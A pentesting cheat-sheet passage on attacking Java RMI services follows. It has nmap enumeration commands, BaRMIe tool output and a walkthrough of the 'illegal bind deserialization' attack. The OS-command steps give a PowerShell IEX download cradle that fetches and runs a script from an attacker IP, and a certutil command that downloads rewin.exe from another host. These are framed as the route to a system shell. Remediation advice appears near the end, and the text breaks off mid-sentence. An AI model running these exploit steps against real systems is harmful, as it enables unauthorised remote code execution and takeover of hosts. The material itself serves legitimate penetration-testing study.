Java-RMI 1098/1099/1050

1098/1099/1050

Automatic Commands

Protocol_Name: Java-RMI    #Protocol Abbreviation if there is one.
Port_Number:  1098     #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Inclusion         #Protocol Abbreviation Spelled out
​
Entry_1:
  Name: Notes
  Description: Notes for Java-RMI
  Note: |
    The Java Remote Method Invocation, or Java RMI, is a mechanism that allows an object that exists in one Java virtual machine to access and call methods that are contained in another Java virtual machine; This is basically the same thing as a remote procedure call, but in an object-oriented paradigm instead of a procedural one, which allows for communication between Java programs that are not in the same address space.
​
    nmap -sC -sV -Pn 10.11.1.73 -p 1100 
        may dump the reg of the java-rmi instance. If this is the case the machine may be vulnerable to a deserializaion exploit.
        BaRMIe.jar is the way to go to directly exploit this vulnerability.
        https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01      is where the latest build is hosted, pre-built
​
    useage
        java -jar BaRMIe_v1.01.jar -attack 10.11.1.73 1100
        target select)          1
        available attacks)    1 (illegal bind deserialization)
        payloads)                1 (Apache Common Collections 3.1 worked for me, others may also work)
        OS Command)         powershell.exe -command "IEX(new-object net.webclient).downloadstring('http://192.168.119.167:80/3232.ps1')"
​
        enjoy your system shell!
​
    https://book.hacktricks.xyz/pentesting/1099-pentesting-java-rmi
​
Entry_2:
  Name: Nmap RMI
  Description: Nmap with RMI Scripts
  Command: nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098 {IP}
​
Entry_3:
  Name: Nmap register
  Description: Dump register of java-rmi instance
  Command: nmap -sC -sV -Pn {IP} -p 1100

BaRMIe

References

Java RMI enumeration and attack tool

• https://github.com/NickstaDB/BaRMIe
• https://inventory.rawsec.ml/tools.html#BaRMIe

Example of execution

java -jar BaRMIe_v1.01.jar -enum 10.0.0.1 1100 ▄▄▄▄ ▄▄▄ ██▀███ ███▄ ▄███▓ ██▓▓█████ ▓█████▄ ▒████▄ ▓██ ▒ ██▒▓██▒▀█▀ ██▒▓██▒▓█ ▀ ▒██▒ ▄██▒██ ▀█▄ ▓██ ░▄█ ▒▓██ ▓██░▒██▒▒███ ▒██░█▀ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██ ▒██ ░██░▒▓█ ▄ ░▓█ ▀█▓ ▓█ ▓██▒░██▓ ▒██▒▒██▒ ░██▒░██░░▒████▒ ░▒▓███▀▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░ ▒░ ░ ░░▓ ░░ ▒░ ░ ▒░▒ ░ ▒ ▒▒ ░ ░▒ ░ ▒░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ v1.0 Java RMI enumeration tool. Written by Nicky Bloor (@NickstaDB) Warning: BaRMIe was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program. Scanning 1 target(s) for objects exposed via an RMI registry... [-] An exception occurred during the PassThroughProxyThread main loop. java.net.SocketException: Socket closed [-] An exception occurred during the ReplyDataCapturingProxyThread main loop. java.net.SocketException: Socket closed RMI Registry at 10.0.0.1:1100 Objects exposed: 1 Object 1 Name: creamtec/ajaxswing/JVMFactory Endpoint: 10.0.0.1:49161 Classes: 3 Class 1 Classname: java.rmi.server.RemoteStub Class 2 Classname: java.rmi.server.RemoteObject Class 3 Classname: com.creamtec.ajaxswing.core.JVMFactory_Stub 1 potential attacks identified (+++ = more reliable) [---] Java RMI registry illegal bind deserialization 0 deserialization gadgets found on leaked CLASSPATH [~] Gadgets may still be present despite CLASSPATH not being leaked Successfully scanned 1 target(s) for objects exposed via RMI.

Equivalent with nmap

sudo nmap -sSVC --script rmi-dumpregistry -p 1100 10.0.0.1 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-02 01:16 CEST Nmap scan report for 10.0.0.1 Host is up (0.13s latency). PORT STATE SERVICE VERSION 1100/tcp open java-rmi Java RMI Registry | rmi-dumpregistry: | creamtec/ajaxswing/JVMFactory | com.creamtec.ajaxswing.core.JVMFactory_Stub | @10.0.0.1:49161 | extends | java.rmi.server.RemoteStub | extends |_ java.rmi.server.RemoteObject MAC Address: 00:50:56:93:08:41 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds

Attack mode

Add -attack option.

Deserialization payloads for: 10.0.0.1:1100
 1) Apache Commons Collections 3.1, 3.2, 3.2.1
 2) Apache Commons Collections 4.0-alpha1, 4.0
 3) Apache Groovy 1.7-beta-1 to 2.4.0-beta-4
 4) Apache Groovy 2.4.0-rc1 to 2.4.3
 5) JBoss Interceptors API
 6) ROME 0.5 to 1.0
 7) ROME 1.5 to 1.7.3
 8) Mozilla Rhino 1.7r2
 9) Mozilla Rhino 1.7r2 for Java 1.4
 10) Mozilla Rhino 1.7r3
 11) Mozilla Rhino 1.7r3 for Java 1.4
 12) Mozilla Rhino 1.7r4 and 1.7r5
 13) Mozilla Rhino 1.7r6, 1.7r7, and 1.7.7.1
 a) Try all available deserialization payloads
Select a payload to use (b to back up, q to quit): 1

Enter an OS command to execute: certutil.exe -urlcache -split -f http://10.11.0.75:8000/rewin.exe rewin.exe
[~] Starting RMI registry proxy...
[+] Proxy started
[~] Getting proxied RMI Registry reference...
[~] Calling bind(PAYLOAD, null)...

[~] Attack completed but success could not be verified.

Remediation advice (if attack was successful):
  [Java] Update to Java 6u141, Java 7u131, Java 8u121, JRockit R28.3.13 or greater.
  [Apache Commons Collections] Update to Apache Commons Collections 3.2.2 or greater.

Attack: Java RMI registry illegal bind deserialization [---]

Java version 6u131, 7u121, 8u121 and below, and JRockit R28.3.12 and below do n